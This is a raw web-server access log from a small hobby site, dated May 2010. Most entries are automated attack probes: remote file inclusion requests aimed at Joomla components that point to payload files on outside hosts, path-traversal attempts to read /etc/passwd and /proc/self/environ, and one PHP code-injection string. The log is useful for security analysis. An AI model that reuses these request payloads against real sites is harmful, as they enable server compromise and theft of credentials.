174.46.190.110 - - [30/Apr/2010:23:42:25 -0500] "GET /logs/access_log.1219708800%20%20//?custompluginfile[]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
121.88.4.141 - - [30/Apr/2010:23:45:29 -0500] "GET /logs/access_log.1270684800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kangnung.org//zb//idxx.txt????????? HTTP/1.1" 404 340 "-""Mozilla/5.0"
121.88.4.141 - - [30/Apr/2010:23:45:29 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kangnung.org//zb//idxx.txt????????? HTTP/1.1" 404 316 "-""Mozilla/5.0"
121.88.4.141 - - [30/Apr/2010:23:45:29 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kangnung.org//zb//idxx.txt????????? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.250.255.243 - - [30/Apr/2010:23:47:23 -0500] "GET /logs/access_log.1219708800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.46.190.110 - - [30/Apr/2010:23:56:05 -0500] "GET /logs/access_log.1219708800//?custompluginfile[]=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
87.250.255.243 - - [30/Apr/2010:23:58:17 -0500] "GET /artwork/puzzles.htm HTTP/1.1" 200 1591 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.43 - - [30/Apr/2010:23:59:17 -0500] "GET /logs/access_log.1270684800 HTTP/1.1" 200 612778 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [01/May/2010:00:04:58 -0500] "GET /logs/access_log.1230940800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
211.232.85.247 - - [01/May/2010:00:05:56 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.232.85.247 - - [01/May/2010:00:05:56 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
211.232.85.247 - - [01/May/2010:00:05:56 -0500] "GET /logs/access_log.1219708800//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gigacenter.cl//tmp/auto1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
69.4.232.155 - - [01/May/2010:00:21:35 -0500] "GET /logs/inurl:rssreader.php' HTTP/1.1" 404 309 "-""libwww-perl/5.805"
69.4.232.155 - - [01/May/2010:00:21:35 -0500] "GET /inurl:rssreader.php' HTTP/1.1" 404 304 "-""libwww-perl/5.805"
67.195.112.180 - - [01/May/2010:00:24:51 -0500] "GET /logs/access_log.1222646400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [01/May/2010:00:26:23 -0500] "GET /logs/access_log.1218672000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [01/May/2010:00:28:35 -0500] "GET /logs/access_log.1269475200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [01/May/2010:00:31:15 -0500] "GET /logs/access_log.1222992000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.108.177.125 - - [01/May/2010:00:39:51 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.icts.it//components/com_virtuemart//themes/default/id1.txt????????????? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
114.108.177.125 - - [01/May/2010:00:39:51 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.icts.it//components/com_virtuemart//themes/default/id1.txt????????????? HTTP/1.1" 200 3858 "-""Mozilla/5.0"
114.108.177.125 - - [01/May/2010:00:39:51 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.icts.it//components/com_virtuemart//themes/default/id1.txt????????????? HTTP/1.1" 404 312 "-""Mozilla/5.0"
114.108.177.125 - - [01/May/2010:00:39:52 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.icts.it//components/com_virtuemart//themes/default/id1.txt????????????? HTTP/1.1" 200 3858 "-""Mozilla/5.0"
114.108.177.125 - - [01/May/2010:00:39:52 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.icts.it//components/com_virtuemart//themes/default/id1.txt????????????? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
114.108.177.125 - - [01/May/2010:00:39:52 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.icts.it//components/com_virtuemart//themes/default/id1.txt????????????? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.221.63.33 - - [01/May/2010:00:48:57 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 290 "-""Mozilla/5.0"
66.221.63.33 - - [01/May/2010:00:48:57 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 295 "-""Mozilla/5.0"
66.221.63.33 - - [01/May/2010:00:48:57 -0500] "GET /logs/access_log.1270684800%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 319 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:00:52:31 -0500] "GET /logs/access_log.1219708800/?sourcedir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:00:52:31 -0500] "GET /logs/?sourcedir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 3853 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:00:52:31 -0500] "GET /?sourcedir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
66.221.63.33 - - [01/May/2010:00:56:55 -0500] "GET /logs/access_log.1270684800//s_loadenv.inc.php?DOCUMENT_ROOT=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 317 "-""Mozilla/5.0"
87.250.255.243 - - [01/May/2010:00:59:33 -0500] "GET /logs/access_log.1246492800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
188.130.32.85 - - [01/May/2010:01:00:55 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
188.130.32.85 - - [01/May/2010:01:00:55 -0500] "GET /logs/access_log.1270684800%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
188.130.32.85 - - [01/May/2010:01:00:55 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
188.130.32.85 - - [01/May/2010:01:05:20 -0500] "GET /logs/access_log.1270684800//s_loadenv.inc.php?DOCUMENT_ROOT=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
212.26.227.88 - - [01/May/2010:01:05:28 -0500] "GET /logs/access_log.1219708800%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
212.26.227.88 - - [01/May/2010:01:05:28 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
212.26.227.88 - - [01/May/2010:01:05:29 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
212.26.227.88 - - [01/May/2010:01:07:32 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
212.26.227.88 - - [01/May/2010:01:07:32 -0500] "GET /logs/access_log.1219708800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
212.26.227.88 - - [01/May/2010:01:07:32 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
67.195.112.180 - - [01/May/2010:01:07:50 -0500] "GET /logs/access_log.1197072000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.129.119.10 - - [01/May/2010:01:11:15 -0500] "GET /logs/access_log.1235606400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
81.176.226.186 - - [01/May/2010:01:12:29 -0500] "GET /logs//Shop//blocks/block_site_map.php?root_folder_path=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 321 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
81.176.226.186 - - [01/May/2010:01:12:29 -0500] "GET //Shop//blocks/block_site_map.php?root_folder_path=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 316 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
212.26.227.88 - - [01/May/2010:01:12:56 -0500] "GET /logs/access_log.1270684800%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
212.26.227.88 - - [01/May/2010:01:19:15 -0500] "GET /logs/access_log.1219708800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
67.195.112.180 - - [01/May/2010:01:24:18 -0500] "GET /logs/access_log.1177200000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.90 - - [01/May/2010:01:24:26 -0500] "GET /artwork/whirligigs.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.86.210.130 - - [01/May/2010:01:30:45 -0500] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 336 "-""libwww-perl/5.810"
74.86.210.130 - - [01/May/2010:01:30:46 -0500] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 331 "-""libwww-perl/5.810"
82.96.90.170 - - [01/May/2010:01:34:06 -0500] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 336 "-""libwww-perl/5.805"
82.96.90.170 - - [01/May/2010:01:34:06 -0500] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 331 "-""libwww-perl/5.805"
207.46.204.205 - - [01/May/2010:01:34:50 -0500] "GET /logs/ HTTP/1.1" 200 3853 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729; MS-RTC LM 8)"
87.250.255.243 - - [01/May/2010:01:36:33 -0500] "GET /logs/access_log.1221004800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.115.111.248 - - [01/May/2010:01:37:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
74.86.210.130 - - [01/May/2010:01:38:11 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
91.194.91.194 - - [01/May/2010:01:40:39 -0500] "GET /?mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
91.194.91.194 - - [01/May/2010:01:40:40 -0500] "GET /logs/?mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3853 "-""oi"
91.194.91.194 - - [01/May/2010:01:40:40 -0500] "GET /logs/access_log.1266019200/?mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
74.86.210.130 - - [01/May/2010:01:40:41 -0500] "GET /logs/access_log.1219708800//components/com_zoom/includes/database.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 353 "-""libwww-perl/5.810"
74.86.210.130 - - [01/May/2010:01:40:41 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
74.86.210.130 - - [01/May/2010:01:40:41 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 331 "-""libwww-perl/5.810"
74.86.210.130 - - [01/May/2010:01:41:13 -0500] "GET /logs/access_log.1219708800//components/com_zoom/includes/database.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 353 "-""libwww-perl/5.810"
74.86.210.130 - - [01/May/2010:01:41:13 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 326 "-""libwww-perl/5.810"
74.86.210.130 - - [01/May/2010:01:41:13 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 331 "-""libwww-perl/5.810"
123.125.68.75 - - [01/May/2010:01:42:16 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
74.86.210.130 - - [01/May/2010:01:42:43 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
74.86.210.130 - - [01/May/2010:01:43:05 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
74.86.210.130 - - [01/May/2010:01:43:05 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
74.86.210.130 - - [01/May/2010:01:44:30 -0500] "GET /logs/access_log.1270684800//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 338 "-""libwww-perl/5.810"
74.86.210.130 - - [01/May/2010:01:44:30 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
74.86.210.130 - - [01/May/2010:01:44:30 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
67.195.112.180 - - [01/May/2010:01:47:57 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.241 - - [01/May/2010:01:48:34 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.241 - - [01/May/2010:01:48:34 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [01/May/2010:01:52:45 -0500] "GET /costume/thmb5.htm HTTP/1.0" 200 3414 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [01/May/2010:01:55:45 -0500] "GET /logs/access_log.1228089600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.85 - - [01/May/2010:02:02:25 -0500] "GET /logs/access_log.1159401600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.43 - - [01/May/2010:02:02:59 -0500] "GET /artwork/carousel.htm HTTP/1.1" 200 814 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.195.229 - - [01/May/2010:02:04:26 -0500] "GET /logs/access_log.1174608000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.43 - - [01/May/2010:02:04:31 -0500] "GET /logs/access_log.1261958400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.204.189 - - [01/May/2010:02:05:55 -0500] "GET /logs/access_log.1171670400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [01/May/2010:02:05:59 -0500] "GET /logs/access_log.1243814400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [01/May/2010:02:06:07 -0500] "GET /artwork/dressers.htm HTTP/1.1" 200 1093 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.49.100.254 - - [01/May/2010:02:06:26 -0500] "GET /logs/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:02:06:26 -0500] "GET /logs/access_log.1218499200%20%20/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.49.100.254 - - [01/May/2010:02:06:27 -0500] "GET /errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.208.34.38 - - [01/May/2010:02:06:30 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.208.34.38 - - [01/May/2010:02:06:30 -0500] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:02:06:31 -0500] "GET /errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:02:06:32 -0500] "GET /logs/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:02:06:32 -0500] "GET /logs/access_log.1218499200%20%20/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
81.208.34.38 - - [01/May/2010:02:06:38 -0500] "GET /logs/access_log.1270598400%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:02:06:54 -0500] "GET /errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:02:06:55 -0500] "GET /logs/access_log.1218499200%20%20/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
115.124.119.4 - - [01/May/2010:02:06:55 -0500] "GET /logs/errors.php?error=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.208.34.38 - - [01/May/2010:02:09:00 -0500] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
81.208.34.38 - - [01/May/2010:02:09:03 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
81.208.34.38 - - [01/May/2010:02:09:04 -0500] "GET /logs/access_log.1270598400%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.54.71.20 - - [01/May/2010:02:11:35 -0500] "GET /artwork/jewelrybox-ballerina1.jpg HTTP/1.1" 200 50948 "-""-"
121.190.102.21 - - [01/May/2010:02:11:54 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:02:11:54 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.190.102.21 - - [01/May/2010:02:11:54 -0500] "GET /logs/access_log.1217376000//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:13:31 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:13:31 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:13:31 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
92.241.190.214 - - [01/May/2010:02:13:33 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
92.241.190.214 - - [01/May/2010:02:13:33 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
92.241.190.214 - - [01/May/2010:02:13:33 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
216.131.91.180 - - [01/May/2010:02:13:35 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:13:36 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:13:36 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
92.241.190.214 - - [01/May/2010:02:13:37 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ncaftc.org/images/id.jpg?? HTTP/1.1" 404 324 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
216.131.91.180 - - [01/May/2010:02:13:46 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:13:48 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:13:48 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:13:49 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:13:49 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:13:50 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:13:51 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:13:52 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:13:52 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:13:54 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:13:54 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:13:55 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
216.131.91.180 - - [01/May/2010:02:14:02 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
